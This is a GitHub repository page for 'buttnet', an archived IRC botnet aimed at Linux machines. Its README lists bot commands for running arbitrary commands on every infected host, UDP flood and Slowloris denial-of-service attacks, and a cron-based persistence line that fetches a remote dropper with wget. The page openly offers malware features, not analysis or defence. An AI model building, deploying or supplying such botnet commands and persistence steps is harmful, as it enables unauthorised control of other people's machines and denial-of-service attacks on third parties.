Skip to content
This repository has been archived by the owner on Jan 16, 2022. It is now read-only.

huntergregal/buttnet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 

Repository files navigation

buttnet

A simple IRC Botnet for linux-based targets

##Features ###Commands

  • !say <message>- Echos message back to channel
    • Command output is PM'd back to command issuer
  • !cmd <command> - Runs command on all bots in channel, or bot PM'd
  • !udp <host> <port | 0 for random> <time(s)> - UDP flood DDoS attack
  • !slowloris <http|https://host> <port> <GET|POST> <threads> <time(s)> - Slowloris DDoS attack [!UNDER CONSTRUCTION!]

###Dropper Dropper allows remote persistence. Example:

  • echo "wget http://target/dropper.php" > /etc/cron.weekly/persistence.sh

###Mutex Lock file acts as a mutex to prevent multiple instances of the bot from running at once

About

A simple IRC Botnet for linux-based targets

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages